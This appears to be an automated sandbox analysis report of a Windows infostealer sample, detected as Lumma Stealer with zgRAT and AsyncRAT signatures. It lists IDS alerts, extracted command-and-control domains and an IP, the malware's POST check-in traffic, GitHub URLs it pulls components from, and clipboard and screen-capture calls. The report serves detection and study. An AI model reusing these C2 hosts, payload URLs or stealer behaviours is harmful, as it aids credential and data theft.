Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov dword ptr [esp], 00000000h	13_2_004193C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esp]	13_2_00442380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	13_2_0043CC30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	13_2_0041FCFF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [eax], cx	13_2_00422480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ecx], al	13_2_0041CC90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edi, ecx	13_2_0041CC90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edx, dword ptr [ebp-10h]	13_2_00440554
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edx, dword ptr [ebp-10h]	13_2_00440554
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 625B6034h	13_2_00440554
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ebx, dword ptr [ebp-10h]	13_2_00441D50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	13_2_00422D6A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edx, eax	13_2_00422D6A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], CECD21FDh	13_2_0042CD06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h	13_2_0042B510
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx eax, word ptr [esi+ecx]	13_2_0043AD90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 0633C81Dh	13_2_0043D630
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then push eax	13_2_004386C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp ebx	13_2_0040E6E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp edx	13_2_0043C696
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h	13_2_004436A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edx, byte ptr [esi+ebx]	13_2_00405770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	13_2_0042AFD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edx, dword ptr [esp+10h]	13_2_004247E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edx, dword ptr [esp+10h]	13_2_004247E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, ebp	13_2_00409F80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, ebp	13_2_00409F80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	13_2_004287AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	13_2_004357B0

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2055880 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (eemmbryequo .shop in TLS SNI) : 192.168.11.20:49784 -> 172.67.142.26:443
Source: Network traffic	Suricata IDS: 2035595 - Severity 1 - ET MALWARE Generic AsyncRAT Style SSL Cert : 45.11.229.96:56001 -> 192.168.11.20:49782
Source: Network traffic	Suricata IDS: 2055879 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eemmbryequo .shop) : 192.168.11.20:57305 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2055880 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (eemmbryequo .shop in TLS SNI) : 192.168.11.20:49785 -> 172.67.142.26:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.11.20:49784 -> 172.67.142.26:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.11.20:49784 -> 172.67.142.26:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.11.20:49785 -> 172.67.142.26:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.11.20:49785 -> 172.67.142.26:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: keennylrwmqlw.shop
Source: Malware configuration extractor	URLs: tesecuuweqo.shop
Source: Malware configuration extractor	URLs: relaxatinownio.shop
Source: Malware configuration extractor	URLs: eemmbryequo.shop
Source: Malware configuration extractor	URLs: reggwardssdqw.shop
Source: Malware configuration extractor	URLs: tendencctywop.shop
Source: Malware configuration extractor	URLs: licenseodqwmqn.shop
Source: Malware configuration extractor	URLs: tryyudjasudqo.shop

Uses ping.exe to check the status of other devices and networks

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 localhost

Source: global traffic

TCP traffic: 192.168.11.20:49782 -> 45.11.229.96:56001

Source: Joe Sandbox View

IP Address: 172.67.142.26 172.67.142.26

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: ALPHAONE-ASUS ALPHAONE-ASUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: eemmbryequo.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=0fcLYSc6YsiKoAYwmJmcMFCKyHhREaq9Ck1_0rmeC58-1726706343-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 74Host: eemmbryequo.shop

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	DNS traffic detected: DNS query: strompreis.ru
Source: global traffic	DNS traffic detected: DNS query: eemmbryequo.shop

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: eemmbryequo.shop

Source: l6E.exe.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: l6E.exe.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: l6E.exe.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: l6E.exe.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: 57lklPjdPc.exe, 00000000.00000002.50545734563.0000000005DD0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.49308050475.0000000002CB3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: 57lklPjdPc.exe, 00000000.00000002.50545734563.0000000005DD0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.49308050475.0000000002C98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000002.00000002.49315828054.0000000007108000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsw
Source: l6E.exe.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: l6E.exe.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: l6E.exe.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: l6E.exe.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: l6E.exe.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
Source: 57lklPjdPc.exe, 00000000.00000002.50545734563.0000000005DD0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: 57lklPjdPc.exe, 00000000.00000002.50545734563.0000000005DD0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: powershell.exe, 00000002.00000002.49313777197.000000000587F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: l6E.exe.0.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: l6E.exe.0.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: l6E.exe.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: l6E.exe.0.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: powershell.exe, 00000002.00000002.49309138147.0000000004968000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.49315232618.0000000007030000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.49309138147.0000000004968000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png4
Source: 57lklPjdPc.exe, 00000000.00000002.50531977968.000000000373A000.00000004.00000800.00020000.00000000.sdmp, 57lklPjdPc.exe, 00000000.00000002.50531977968.0000000003298000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.49309138147.0000000004811000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.49309138147.0000000004968000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.49315828054.00000000070E1000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.49315232618.0000000007030000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.49309138147.0000000004968000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html4
Source: l6E.exe.0.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: powershell.exe, 00000002.00000002.49315828054.0000000007108000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.5
Source: 57lklPjdPc.exe, 00000000.00000002.50545734563.0000000005DD0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.49308050475.0000000002CB3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.quovadis.bm0
Source: powershell.exe, 00000002.00000002.49309138147.0000000004811000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lBmq
Source: powershell.exe, 00000002.00000002.49313777197.000000000587F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.49313777197.000000000587F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.49313777197.000000000587F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: RegAsm.exe, 0000000D.00000002.50081821203.0000000001449000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.50080745880.000000000142F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://eemmbryequo.shop/
Source: RegAsm.exe, 0000000D.00000002.50080745880.000000000142F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://eemmbryequo.shop/U
Source: RegAsm.exe, 0000000D.00000002.50080745880.000000000137A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://eemmbryequo.shop/api
Source: RegAsm.exe, 0000000D.00000002.50081821203.0000000001439000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://eemmbryequo.shop/api3
Source: RegAsm.exe, 0000000D.00000002.50080745880.000000000137A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://eemmbryequo.shop/api7
Source: RegAsm.exe, 0000000D.00000002.50080745880.000000000142F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://eemmbryequo.shop/le4K#
Source: powershell.exe, 00000002.00000002.49309138147.0000000004968000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.49315232618.0000000007030000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.49309138147.0000000004968000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester4
Source: 57lklPjdPc.exe, 00000000.00000002.50531977968.0000000003298000.00000004.00000800.00020000.00000000.sdmp, 57lklPjdPc.exe, 00000000.00000002.50531977968.0000000003497000.00000004.00000800.00020000.00000000.sdmp, 57lklPjdPc.exe, 00000004.00000002.49603643595.00000000031C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/testdemo345/DemoThing/raw/main/WebDriver.dll
Source: 57lklPjdPc.exe, 00000000.00000002.50531977968.0000000003298000.00000004.00000800.00020000.00000000.sdmp, 57lklPjdPc.exe, 00000000.00000002.50531977968.0000000003497000.00000004.00000800.00020000.00000000.sdmp, 57lklPjdPc.exe, 00000004.00000002.49603643595.00000000031C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/testdemo345/DemoThing/raw/main/chromedriver.exe
Source: 57lklPjdPc.exe, 00000000.00000002.50531977968.0000000003298000.00000004.00000800.00020000.00000000.sdmp, 57lklPjdPc.exe, 00000004.00000002.49603643595.00000000031C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/testdemo345/DemoThing/raw/main/msedgedriver.exe
Source: 57lklPjdPc.exe, 00000000.00000002.50531977968.0000000003497000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/testdemo345/DemoThing/raw/main/msedgedriver.execABCDEFGHIJKLMNOPQRSTUVWXYZabcdefg
Source: powershell.exe, 00000002.00000002.49313777197.000000000587F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: 57lklPjdPc.exe, 00000000.00000002.50545734563.0000000005DD0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.49308050475.0000000002CB3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: 57lklPjdPc.exe, 00000000.00000002.50531977968.0000000003298000.00000004.00000800.00020000.00000000.sdmp, 57lklPjdPc.exe, 00000000.00000002.50531977968.0000000003497000.00000004.00000800.00020000.00000000.sdmp, 57lklPjdPc.exe, 00000004.00000002.49603643595.00000000031C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: 57lklPjdPc.exe, 00000000.00000002.50531977968.0000000003298000.00000004.00000800.00020000.00000000.sdmp, 57lklPjdPc.exe, 00000000.00000002.50531977968.0000000003497000.00000004.00000800.00020000.00000000.sdmp, 57lklPjdPc.exe, 00000004.00000002.49603643595.00000000031C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: 57lklPjdPc.exe, 00000000.00000002.50531977968.0000000003298000.00000004.00000800.00020000.00000000.sdmp, 57lklPjdPc.exe, 00000000.00000002.50531977968.0000000003497000.00000004.00000800.00020000.00000000.sdmp, 57lklPjdPc.exe, 00000004.00000002.49603643595.00000000031C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354rCannot

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443

Source: unknown	HTTPS traffic detected: 172.67.142.26:443 -> 192.168.11.20:49784 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.142.26:443 -> 192.168.11.20:49785 version: TLS 1.2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 13_2_00432D80 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

13_2_00432D80

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 13_2_00432D80 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

13_2_00432D80

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 13_2_00432EF0 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,

13_2_00432EF0

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.57lklPjdPc.exe.458aac8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 0.2.57lklPjdPc.exe.444aaa8.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 0.2.57lklPjdPc.exe.7490000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 0.2.57lklPjdPc.exe.458aac8.1.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 0.2.57lklPjdPc.exe.7490000.8.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 0.2.57lklPjdPc.exe.444aaa8.7.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 00000000.00000002.50550437994.0000000007490000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects zgRAT Author: ditekSHen

.NET source code contains very large array initializations

Source: 57lklPjdPc.exe, InfoBaseConnector.cs	Large array initialization: CheckEvent: array initializer size 294576
Source: 57lklPjdPc.exe.0.dr, InfoBaseConnector.cs	Large array initialization: CheckEvent: array initializer size 294576
Source: l6E.exe.0.dr, MoveAngles.cs	Large array initialization: MoveAngles: array initializer size 333824
Source: 0.2.57lklPjdPc.exe.42d1467.3.raw.unpack, MoveAngles.cs	Large array initialization: MoveAngles: array initializer size 333824

Source: C:\Users\user\Desktop\57lklPjdPc.exe	Code function: 0_2_016B3E51	0_2_016B3E51
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Code function: 0_2_016B3EA0	0_2_016B3EA0
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Code function: 0_2_016F7D88	0_2_016F7D88
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Code function: 0_2_016F4E78	0_2_016F4E78
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Code function: 0_2_05765530	0_2_05765530
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Code function: 0_2_05761D30	0_2_05761D30
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Code function: 0_2_0576D5C8	0_2_0576D5C8
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Code function: 0_2_0576D910	0_2_0576D910
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Code function: 0_2_0576E1E0	0_2_0576E1E0
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Code function: 0_2_057651D0	0_2_057651D0
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Code function: 0_2_057649F3	0_2_057649F3
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Code function: 0_2_057649F8	0_2_057649F8
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Code function: 0_2_0576B1C0	0_2_0576B1C0
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Code function: 0_2_057651BF	0_2_057651BF
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Code function: 0_2_05761AB8	0_2_05761AB8
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Code function: 0_2_05761AA6	0_2_05761AA6
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Code function: 0_2_05ED8D18	0_2_05ED8D18
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Code function: 0_2_05ED9202	0_2_05ED9202
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Code function: 0_2_05EDAFD0	0_2_05EDAFD0
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Code function: 0_2_05EDDF88	0_2_05EDDF88
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Code function: 0_2_05FC9070	0_2_05FC9070
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Code function: 0_2_05FC0040	0_2_05FC0040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_045440A7	2_2_045440A7
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Code function: 4_2_02FEE1E0	4_2_02FEE1E0
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Code function: 4_2_02FE51D0	4_2_02FE51D0
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Code function: 4_2_02FED5C8	4_2_02FED5C8
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Code function: 4_2_02FE1AB8	4_2_02FE1AB8
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Code function: 4_2_02FE1AA6	4_2_02FE1AA6
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Code function: 4_2_02FE49F8	4_2_02FE49F8
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Code function: 4_2_02FE49EA	4_2_02FE49EA
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Code function: 4_2_02FEB1C0	4_2_02FEB1C0
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Code function: 4_2_02FE51BF	4_2_02FE51BF
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Code function: 4_2_02FED910	4_2_02FED910
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Code function: 5_2_015051D0	5_2_015051D0
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Code function: 5_2_0150E1E0	5_2_0150E1E0
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Code function: 5_2_0150D5C8	5_2_0150D5C8
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Code function: 5_2_0150D910	5_2_0150D910
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Code function: 5_2_0150B1C0	5_2_0150B1C0
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Code function: 5_2_015049F6	5_2_015049F6
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Code function: 5_2_015049F8	5_2_015049F8
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Code function: 5_2_01505188	5_2_01505188
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Code function: 5_2_015051BF	5_2_015051BF
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Code function: 5_2_01501AB8	5_2_01501AB8
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Code function: 5_2_01501AA6	5_2_01501AA6
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Code function: 5_2_0150451D	5_2_0150451D
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Code function: 5_2_0150AFD4	5_2_0150AFD4
Source: C:\Users\user\AppData\Roaming\l6E.exe	Code function: 10_2_024D0B8F	10_2_024D0B8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_0040F140	13_2_0040F140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00438965	13_2_00438965
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00410BE0	13_2_00410BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_0040F7C0	13_2_0040F7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00441840	13_2_00441840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_0041E070	13_2_0041E070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00401000	13_2_00401000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00412001	13_2_00412001
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00410000	13_2_00410000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_004230CB	13_2_004230CB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00423940	13_2_00423940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00409909	13_2_00409909
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00444110	13_2_00444110
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_0041A1C0	13_2_0041A1C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00407980	13_2_00407980
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00425198	13_2_00425198
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_004299B5	13_2_004299B5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00424A4F	13_2_00424A4F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00442262	13_2_00442262
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00410A70	13_2_00410A70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_0042E223	13_2_0042E223
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00412A2C	13_2_00412A2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_004092C5	13_2_004092C5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_004012F0	13_2_004012F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00443AF0	13_2_00443AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_0040BA90	13_2_0040BA90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00432B60	13_2_00432B60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00427370	13_2_00427370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00414374	13_2_00414374
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00437B00	13_2_00437B00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_0040EB20	13_2_0040EB20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00408320	13_2_00408320
